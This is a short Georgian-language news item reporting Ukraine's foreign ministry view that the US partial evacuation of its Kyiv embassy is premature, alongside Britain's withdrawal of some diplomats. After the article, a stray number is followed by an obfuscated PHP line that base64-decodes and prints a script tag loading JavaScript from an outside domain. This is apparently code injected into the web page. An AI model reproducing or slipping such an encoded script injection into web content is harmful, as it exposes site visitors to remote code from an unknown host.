celsiusi
ავერსი შნაიდერი
უკრაინის საგარეო საქმეთა სამინისტროში მიჩნევენ, რომ ამერიკის შეერთებული შტატების საელჩოდან თანამშრომლების ევაკუაცია ნაადრევია. ამის შესახებ, უკრაინის საგარეო საქმეთა სამინისტროს პრეს-სპიკერმა, ოლეგ ნიკოლენკომ უნიანის კორესპონდენტთან საუბარში განაცხადა. 
 
"საგარეო საქმეთა სამინისტროში ამერიკის შეერთებული შტატების სახელმწიფო დეპარტამენტის გადაწყვეტილება, რომ კიევში საელჩოს თანამშრომლების ოჯახების ნაწილმა უკრაინის დატოვების შესახებ, ასევე თანამშრომლების ნაწილის ნებაყოფლობითი გადაწყვეტილების საფუძველზე უკრაინის ტერიტორია დატოვონ, მიღებულია მხედველობაში", - განაცხადა  ოლეგ ნიკოლენკომ.
 
მისივე თმით, მსგავსი ნაბიჯი ამერიკის შეერთებული შტატების მხრიდან ნაადრევია და გადაჭარბებულ სიფრთხილეს წარმოადგენს.
 
BBC-ის ცნობით, დიდმა ბრიტანეთმა მიიღო გადაწყვეტლება, რომ უკრაინიდან საელჩოს თანამშრომლების ნაწილი გაიყვანოს. მიზეზი კი რუსეთის უკრაინაში შეჭრაა. 
 
"მახალჩინოსანის განცხადებით, განსაკუთრებული საფრთხე ბრიტანელი დიპლომატების მიმართ ინფორმაცია არ მიგვიღია, თუმცა დაახლოები თანამშრომლების ნახევარი, რომლებიც კიევში მუშაობენ, დიდ ბრიტანეთში დაბრუნდებიან", - აღნიშნულია ინფორმაციაში.  
 
ამის შესახებ, მას შემდეგ გახდა ცნობილი, რაც ამერიკის შეერთებულმა შტატებმა საელჩოს თანამშრომლების ნათესავებს მოუწოდა უკრაინის დატოვება. 
1015
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");